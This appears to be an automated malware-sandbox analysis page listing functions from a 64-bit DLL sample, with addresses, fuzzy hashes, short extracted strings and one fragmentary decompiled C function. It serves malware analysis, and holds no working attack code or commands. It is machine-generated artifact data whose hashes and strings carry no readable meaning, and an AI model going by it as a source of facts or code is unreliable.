Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ?P>$g%
API String ID: 0-4203485977
Opcode ID: e7f509d9a25edf16b23a548fc7fe81b9e6bc0ab59227e88e5feb3085b6c3579d
Instruction ID: 717686fd7735f49e019bed61dd90445519292eacbbe0b0eb12e200a6e4bac1a5
Opcode Fuzzy Hash: e7f509d9a25edf16b23a548fc7fe81b9e6bc0ab59227e88e5feb3085b6c3579d
Instruction Fuzzy Hash: 2731B2B090438E8FDB44DF64D88A6DF7BB0FB58348F104A19EC6996250D3B8D664CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800079D8 Relevance: 2.6, Strings: 2, Instructions: 55COMMON

Download Yara Rule

Strings

Ts, xrefs: 0000000180007A84
"X,h, xrefs: 0000000180007AA5

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: "X,h$Ts
API String ID: 0-4155455058
Opcode ID: 217a8b3ebbc510d3abab149b4def833290e522513fd0b99837b1368bb75def2b
Instruction ID: 78e44bf7acd730168ef7454480584198ea74db249acf4ebf7474d583245c3fc9
Opcode Fuzzy Hash: 217a8b3ebbc510d3abab149b4def833290e522513fd0b99837b1368bb75def2b
Instruction Fuzzy Hash: 7D215DB0529785ABD398DF28D08991EBBE0BBC4308F806A1DF8858A350D7B4D548CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800199E8 Relevance: 2.2, Strings: 1, Instructions: 936COMMON

Download Yara Rule

Strings

Mbqz, xrefs: 000000018001ADD0

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: Mbqz
API String ID: 0-2241695783
Opcode ID: c7e5bd259350cc8d432e2e418653ef11db78de1d8ea4b143f2c3ed3acbc8f7f6
Instruction ID: 750b1e4ffae553eb56a080148391b3b5c453ff61d810ae7c75f6761a4f8562eb
Opcode Fuzzy Hash: c7e5bd259350cc8d432e2e418653ef11db78de1d8ea4b143f2c3ed3acbc8f7f6
Instruction Fuzzy Hash: 6BB23CB552568D8FDBBADF28C8A97D93BE5FB5C304F00422ADC0ACA260E7749755CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1466C334 Relevance: 1.6, APIs: 1, Instructions: 150
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00007FFD7FFD1466C334(long long __rbx, void* __rcx, void* __rdx, long long __rsi, signed int __r8, void* __r9) {
				signed long long _t25;
				void* _t27;
				void* _t30;

				 *((long long*)(_t30 + 8)) = __rbx;
				 *(_t30 + 0x10) = _t25;
				 *((long long*)(_t30 + 0x18)) = __rsi;
				_t27 = (_t25 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(__rcx + _t27)) != sil) goto 0x1466c362;
				if (_t27 + __rdx -  !__r8 <= 0) goto 0x1466c39e;
				return __rdx + 0xb;
			}

0x7ffd1466c334
0x7ffd1466c339
0x7ffd1466c33e
0x7ffd1466c362
0x7ffd1466c369
0x7ffd1466c37c
0x7ffd1466c39d

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3dbb0acb19b1786796477eb2973993dd2a31b244324abc6045056baec5c30e6
Instruction ID: a4eaceaa78c67cf9c8dbab3c94702beb552ebed41e1a9bc43d950288cb91ea0b
Opcode Fuzzy Hash: c3dbb0acb19b1786796477eb2973993dd2a31b244324abc6045056baec5c30e6
Instruction Fuzzy Hash: F551F422B08F9185FB209B76A8945EE7BA5FB46BB8F144135EE5C67A99CE3CD401C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000A1D4 Relevance: 1.6, Strings: 1, Instructions: 350COMMON

Download Yara Rule

Strings

m1, xrefs: 000000018000A283

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: m1
API String ID: 0-128121454
Opcode ID: 16691c6ba2deddaf6de1f0e0d1ff2ca3acd048d37c77c35f5dce586baf0938cf
Instruction ID: 5f51607b613c9aae9948664f2987d724fcb5cf1c05a1f438c657f6daf5c41e3f
Opcode Fuzzy Hash: 16691c6ba2deddaf6de1f0e0d1ff2ca3acd048d37c77c35f5dce586baf0938cf
Instruction Fuzzy Hash: 29F11770A04709EFDB58DF68C04A69EBBF2FB48344F40C16DE84AEB290D7759A59CB41

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000A734 Relevance: 1.6, Strings: 1, Instructions: 343COMMON

Download Yara Rule

Strings

7s, xrefs: 000000018000AB55

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 7s
API String ID: 0-1359173241
Opcode ID: c3a57ae48d23b59515346257547aa727b2d15ec4c2b1e011d86899241bc59301
Instruction ID: c1bed52c3035b45a669a36fe4e02841f36ae4e7ddeb46aacfe2c23f9d3337973
Opcode Fuzzy Hash: c3a57ae48d23b59515346257547aa727b2d15ec4c2b1e011d86899241bc59301
Instruction Fuzzy Hash: 3B0267B5A0070DCFDB58CF28C59A59D3BA9FB49308F00412DFD0E9A2A4E7B4E915CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010310 Relevance: 1.6, Strings: 1, Instructions: 337COMMON

Download Yara Rule

Strings

0% E, xrefs: 000000018001081C

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 0% E
API String ID: 0-2094739979
Opcode ID: fbf25035978568d4367fdb2795cf05a7893d79d110a623251b08c664a1ec8ff4
Instruction ID: 3cbd3403ae3a5eec6cd9fa22ed9c4212c86eadd61d9582ce71e19d9336bf90de
Opcode Fuzzy Hash: fbf25035978568d4367fdb2795cf05a7893d79d110a623251b08c664a1ec8ff4
Instruction Fuzzy Hash: C8F108B1A0570CCFDBA8DFA8D58A6CDBBF1FF44344F104119E84AA7290D7B8951ACB49

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180012244 Relevance: 1.5, Strings: 1, Instructions: 274COMMON

Download Yara Rule

Strings

>, xrefs: 00000001800126FC

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: >
API String ID: 0-4048615937
Opcode ID: 35f082249332f6d240efb6a3c148916e58dc78f6fac7b8448015639dc79bfce0
Instruction ID: b0185e3000dff54f49d8606eba530083518bcd1c244eb05af1b54d96feabf3c3
Opcode Fuzzy Hash: 35f082249332f6d240efb6a3c148916e58dc78f6fac7b8448015639dc79bfce0
Instruction Fuzzy Hash: 33D14A715047888BDBF9CF24C88A7D97BE1FB89304F50861DE88ECA291DB749659CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180018778 Relevance: 1.5, Strings: 1, Instructions: 270COMMON

Download Yara Rule

Strings

w, xrefs: 0000000180018AFF

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: w
API String ID: 0-4210951952
Opcode ID: 450a975b33d67058faa5ef23269fdb7d474cb1b00904f6db6eeb6156179070ce
Instruction ID: 98e286694507409f0343718d484b9c1230728cd38d8ca75ba1cdcc522b4ff82c
Opcode Fuzzy Hash: 450a975b33d67058faa5ef23269fdb7d474cb1b00904f6db6eeb6156179070ce
Instruction Fuzzy Hash: CCD1F27550670DCBEBA9CF28C58A6DE3BE5FF48304F104129FC1A862A1D7B4EA25CB45

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180017BF8 Relevance: 1.5, Strings: 1, Instructions: 204COMMON

Download Yara Rule

Strings

k |P, xrefs: 0000000180017C97

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: k |P
API String ID: 0-500141808
Opcode ID: 1aac0f1d3442458b59664808ae9574f9abf7ab878da11c77e58f892187b88b3f
Instruction ID: bdb77ffc642b3299673720cbbe7adc6e022f36649dc5c9d605d8e1814f76fd65
Opcode Fuzzy Hash: 1aac0f1d3442458b59664808ae9574f9abf7ab878da11c77e58f892187b88b3f
Instruction Fuzzy Hash: 28913B30E0061DDBEF69CFA9E8896DDB7B1FB44344F40822DE416A72A1DB74994ACF41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180019230 Relevance: 1.4, Strings: 1, Instructions: 196COMMON

Download Yara Rule

Strings

{?, xrefs: 00000001800194A9

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: {?
API String ID: 0-3906500937
Opcode ID: 2d540e23551ce5f958f4764bec98e9519d494356363efa56796c0522d6c48830
Instruction ID: 7643702d073ff4940ecce4f9a509df35797120a70f9b1d87fbff4b68fa84022d
Opcode Fuzzy Hash: 2d540e23551ce5f958f4764bec98e9519d494356363efa56796c0522d6c48830
Instruction Fuzzy Hash: 90B157B590070DCFEB98CF68C18A9DD3BA9FB15358F404129FC0E96290D7B9E919CB52

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000871C Relevance: 1.4, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

Rg, xrefs: 00000001800089A3

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: Rg
API String ID: 0-444783058
Opcode ID: 062f6907516fb83770376f4ae06b90337ece7bd6ef9ef592e7bb1771c5ef6bb2
Instruction ID: de0b65e82f7df1f72d442b51ab019ddee83380224b4c4f084cb2c80ee98f37ca
Opcode Fuzzy Hash: 062f6907516fb83770376f4ae06b90337ece7bd6ef9ef592e7bb1771c5ef6bb2
Instruction Fuzzy Hash: 9A91087150424D8BEF48CF68C88A6DE3FF0FB18398F255219E84AA6290D778D654CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001D32C Relevance: 1.4, Strings: 1, Instructions: 182COMMON

Download Yara Rule

Strings

RC/, xrefs: 000000018001D40F

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: RC/
API String ID: 0-1672839029
Opcode ID: cd45515637f1f2b16c20ca83177dd82b64ca54d483ea71e032997c7aebad3db9
Instruction ID: 3bbf9db0e9f1f1cd2f3806796f1fd845787a3905c9f06ecb1b9c11751c7e15f2
Opcode Fuzzy Hash: cd45515637f1f2b16c20ca83177dd82b64ca54d483ea71e032997c7aebad3db9
Instruction Fuzzy Hash: 7291FA7150468DABDBBACF28DC9A7D937A0FB48344F90811AD90E8F290DF745B49DB41

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000AE84 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

XU, xrefs: 000000018000AFE4

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: XU
API String ID: 0-683303128
Opcode ID: e071b3a0d50c9461b57229d15226e783a6e60c7e98d42caa5a907250e51fd640
Instruction ID: 425e58cadb221d331942f6c121d336e4e4e9b3bb556196463e5803c943499b9b
Opcode Fuzzy Hash: e071b3a0d50c9461b57229d15226e783a6e60c7e98d42caa5a907250e51fd640
Instruction Fuzzy Hash: 10613B70D14608DBEB9CDFA4E8896DDBBB1FB48344F10812DE816E72A1DB749A49CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180009298 Relevance: 1.4, Strings: 1, Instructions: 144COMMON

Download Yara Rule

Strings

F'K, xrefs: 00000001800094BB

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: F'K
API String ID: 0-2963079709
Opcode ID: 713e8163358f3e4ccf3a322240c7036fe92718bea1a19a215dd26039f06aebda
Instruction ID: 3cdbfef3d71ad5117e50a41d4a808b16c297a78b625f2c46d5022480677e20ff
Opcode Fuzzy Hash: 713e8163358f3e4ccf3a322240c7036fe92718bea1a19a215dd26039f06aebda
Instruction Fuzzy Hash: C481A5749043888BDBB9DF68C8897DDBBB0FB48348F20411EDC5AAB291DBB45685CF41

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001C974 Relevance: 1.4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

Strings

Gh, xrefs: 000000018001CB06

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: Gh
API String ID: 0-277699601
Opcode ID: 7940fb094068dd5baf5e4535b0b949c1577390b24490b32456d4c9773adc2951
Instruction ID: 49f89991b7669aef05847bf6ac8085ae3f2e5bccc0c70176600d3bb48f89c730
Opcode Fuzzy Hash: 7940fb094068dd5baf5e4535b0b949c1577390b24490b32456d4c9773adc2951
Instruction Fuzzy Hash: A2512670614B48ABDBC9DE28C4C669D3FE1FB483A8FA06028FC4786295D774D4C5CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001660 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

KdW, xrefs: 000000018000170C

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: KdW
API String ID: 0-1553299040
Opcode ID: 3dbde57a559d0e97d3426f0fe397d2413bb4c768266781bd1ea48c4852796dec
Instruction ID: 07466cbb68b99a3b5ba183136cc33729b20d4f14bf8bba25a53fc7287070b877
Opcode Fuzzy Hash: 3dbde57a559d0e97d3426f0fe397d2413bb4c768266781bd1ea48c4852796dec
Instruction Fuzzy Hash: 17619EB090074A8BDF48CF28C49A59E7FB1FB68398F60421DFC5696290D374DAA5CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001364 Relevance: 1.4, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

5, xrefs: 00000001800014BD

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 5
API String ID: 0-2458008916
Opcode ID: 3e00d75dc5af6ed95834cd7e36aa8dd6f7dfadaf5872006e22b3d5cd376261b0
Instruction ID: a26923ab85f7e808caed84009aa606e64988cd015e626ed89f9c8f152d3751bb
Opcode Fuzzy Hash: 3e00d75dc5af6ed95834cd7e36aa8dd6f7dfadaf5872006e22b3d5cd376261b0
Instruction Fuzzy Hash: FD51BEB090074E8BDB48CF64C88B5DE7FB0FB68398F20421DEC5696294D3B496A5CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180024098 Relevance: 1.4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

Strings

>, xrefs: 000000018002413F

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: >
API String ID: 0-260571596
Opcode ID: 52da228a42332ba98b714843feb8a4ffa7a865caa0d47f3da51bcc1adbe3605a
Instruction ID: 46fc6c4e0ac0a664899e95d82bf5bf8fb1e46c637e697bbd607199efc3ac47d3
Opcode Fuzzy Hash: 52da228a42332ba98b714843feb8a4ffa7a865caa0d47f3da51bcc1adbe3605a
Instruction Fuzzy Hash: E351187090070E8FDF48DF68C48A5DE7FB0FB58398F255219E80AA6260C7789695CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180018D0C Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

e#y, xrefs: 0000000180018DF8

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: e#y
API String ID: 0-1553523250
Opcode ID: 7cfc1742122b5da270b1305c98699770b0d8300b0d29b437b0f5bbbb71ff1cdb
Instruction ID: 8922a9c917ecf92f84784f2c0912e7afb41abd4682f2986cf207ea24a7e27a88
Opcode Fuzzy Hash: 7cfc1742122b5da270b1305c98699770b0d8300b0d29b437b0f5bbbb71ff1cdb
Instruction Fuzzy Hash: 4451C0B090034A8BDB48DF24C49A4DE7FB1BB68394F60461DEC56AA290D37896A5CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002748C Relevance: 1.4, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

;Qe+, xrefs: 0000000180027515

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ;Qe+
API String ID: 0-3743842969
Opcode ID: abc73cde212dc252b0e5d03e266be842b85d1299fa2b3d615a0caa319cbc98b6
Instruction ID: 2891cc472bdff435687e8dc78c7f584053815dc88c3a0ad3e69441950bb252b7
Opcode Fuzzy Hash: abc73cde212dc252b0e5d03e266be842b85d1299fa2b3d615a0caa319cbc98b6
Instruction Fuzzy Hash: FB51B3B190074A8BDB48CF68C49A5DE7FB0BB68398F114229EC5696250D374DAA5CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800069C0 Relevance: 1.4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

Strings

,', xrefs: 0000000180006AFA

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ,'
API String ID: 0-3722628154
Opcode ID: fb5c24a2de7b785ef7d1522db3a7cd1fc0c6d32909dcdfd4e7ef4007326c169e
Instruction ID: 8bcc0ae8ca8a44d8cc4a64df71be4da37ed53fd059e3607e1506b6ed9a83d4bd
Opcode Fuzzy Hash: fb5c24a2de7b785ef7d1522db3a7cd1fc0c6d32909dcdfd4e7ef4007326c169e
Instruction Fuzzy Hash: 9C51E3B091074A8FDB48CF68C9865DE7FB0FB68394F10421DEC5AA6290D37496A5CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000F174 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

;qct, xrefs: 000000018000F2B3

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ;qct
API String ID: 0-1256533914
Opcode ID: 7e5896647748426d00c93f1e327efcd977346de81977c4c15da4b7b9c787c365
Instruction ID: 5c1d59b2199d0d85db2571b197c7ca3ede17e59358e5629c23b069c973ffe58b
Opcode Fuzzy Hash: 7e5896647748426d00c93f1e327efcd977346de81977c4c15da4b7b9c787c365
Instruction Fuzzy Hash: B741E27051078D8BDB49CF68C88A4DE7BA0FB4835CF155619FC8AA6260D3B8D585CF89

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180009BEC Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

%[, xrefs: 0000000180009CD2

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: %[
API String ID: 0-3862537531
Opcode ID: f1dc08e8e3e3301475fb70ff4cfa84bb86d735aa649ff25d3a10773117e6cde7
Instruction ID: 6a4ad4b0db03769040014b30bff45f2a66b5b8118bf8a9f7d20fa3eb207c29ac
Opcode Fuzzy Hash: f1dc08e8e3e3301475fb70ff4cfa84bb86d735aa649ff25d3a10773117e6cde7
Instruction Fuzzy Hash: 6E31D6B150478A8BDB4CDF68D8565AE3BB1FB48304F004A2DFD26DB390D7B49624CB94

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002629C Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

Wn, xrefs: 00000001800263A2

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: Wn
API String ID: 0-506041651
Opcode ID: 571cac09fbe3685261a59c499fbd8c80fdf8cf6d47964e918e1805a2c447958a
Instruction ID: 81acd842a4d7b99bb8f16045e05b91d2bb3390d65dcb5750e05b0634c9df5c42
Opcode Fuzzy Hash: 571cac09fbe3685261a59c499fbd8c80fdf8cf6d47964e918e1805a2c447958a
Instruction Fuzzy Hash: 5F41D4B050078A8FDF48CF68D89A5DE7BB1FB48348F104A2CEC6696290D3B4D664CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002834 Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

"p, xrefs: 00000001800028A3

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: "p
API String ID: 0-3060671971
Opcode ID: ae29b2ab0911a73132ecede333d1ad00ec6016c3b77c06c2e3197b8238caa4ac
Instruction ID: 6d64e93883db61d95f36b7a5a375b7ada03e85890cb65b9286afd9a0e7997e4a
Opcode Fuzzy Hash: ae29b2ab0911a73132ecede333d1ad00ec6016c3b77c06c2e3197b8238caa4ac
Instruction Fuzzy Hash: 42317EB190438E8FDB48DF68D85A5AE3BA0FB48344F014A1DEC269B354D7B4D664CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007694 Relevance: 1.3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

3k^), xrefs: 00000001800076E9

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 3k^)
API String ID: 0-3788653604
Opcode ID: bb4a256fcbfa579ec56a1ee2ed7beb19ee26f98eb9724182ed08b84c2a93462e
Instruction ID: 9f8dcddef577f6809e8fc1cb2f7e992fa0b5e1cd21e70ff7818dd4bfba9124f9
Opcode Fuzzy Hash: bb4a256fcbfa579ec56a1ee2ed7beb19ee26f98eb9724182ed08b84c2a93462e
Instruction Fuzzy Hash: B7417FB090474E8BDB44CF64C48A5CE7FB0FB68398F200619F859A6250D3B8D6A5CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800078B6 Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

L>, xrefs: 00000001800078C4

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: L>
API String ID: 0-3698593629
Opcode ID: 4505467bed29688f524a608710bc2007b6739dbdf074f8a934cd9a0936b0c64f
Instruction ID: d89d460aa873d83448a17f0a74045e6cf2e1d6238d53f49acea812bb04bd12ae
Opcode Fuzzy Hash: 4505467bed29688f524a608710bc2007b6739dbdf074f8a934cd9a0936b0c64f
Instruction Fuzzy Hash: C23193716183818BD748DF28D45652ABBE1FB8D30CF504B2DF8CAA7255D738D605CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180018ECC Relevance: 1.3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

Strings

4s, xrefs: 0000000180018F49

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 4s
API String ID: 0-872399246
Opcode ID: 6d87eca2fd37755a10645a04d53ddd8ccaa51cb07cf26575bdb0066d7b11df8f
Instruction ID: eeb76c7ae662c84e9fd1594776157fcd1e0c77f05a4f9c485f3ea2b2cc7d31c8
Opcode Fuzzy Hash: 6d87eca2fd37755a10645a04d53ddd8ccaa51cb07cf26575bdb0066d7b11df8f
Instruction Fuzzy Hash: 314181B090474A8FDB48CF64D48A5DF7FB0FB68398F200519E859A62A0D378D6A4CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000BD00 Relevance: 1.3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

Strings

&', xrefs: 000000018000BDEC

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: &'
API String ID: 0-655172784
Opcode ID: 350a21f38a3fdb5f3133185a05ab1b6e8489f4d150297426f8e9146ad85da26a
Instruction ID: e60b1eca4cd057e5464165fc71d6e00ca11e6494182570a2c7a3ee484fb5e5db
Opcode Fuzzy Hash: 350a21f38a3fdb5f3133185a05ab1b6e8489f4d150297426f8e9146ad85da26a
Instruction Fuzzy Hash: DE3179755083818BD348DF28C55641ABBE1BBCC35CF805B2DE4CAAB3A4D778D605CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005590 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

`, xrefs: 0000000180005640

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

